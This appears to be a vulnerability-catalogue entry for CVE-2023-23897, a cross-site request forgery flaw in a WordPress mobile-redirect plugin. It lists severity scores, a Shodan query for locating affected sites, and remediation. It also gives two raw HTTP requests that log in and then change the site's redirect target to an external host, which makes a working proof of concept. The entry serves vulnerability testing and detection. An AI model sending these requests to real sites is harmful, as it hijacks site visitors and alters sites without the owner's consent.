| Title | Ozette Plugins - Cross-Site Request Forgery |
|---|---|
| Author | popcorn94 |
| Severity | Medium |
| Impact | Attackers can perform unauthorized actions on behalf of authenticated users, potentially leading to data manipulation or unauthorized redirects. |
| Remediation | Update to version 1.7.3 or later with CSRF protections implemented. |
| CVSS Score | 4.3 |
| EPSS Score | 0.40065 |
| CVE ID | CVE-2023-23897 |
| CWE ID | CWE-352 |
| Shodan Query | html:"simple-mobile-url-redirect" |
| Tags | cve cve2023 wordpress wp plugins ozette csrf vuln authenticated vkev simple-mobile-url-redirect |
An attacker can update, create, and remove the site’s mobile redirects via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
log=0QOtTM&pwd=FFvufn&wp-submit=Log+In
POST /wp-admin/options-general.php?page=simple-mobile-url-redirect-1.7%2Fmobile-redirect.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Content-Length: 92
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
mobiletoggle=&mobileurl=oast.pro&mobilemode=301&mobileredirectoncedays=7&submit=Save+Changes
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-23897.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-23897.pcap
N/AN/A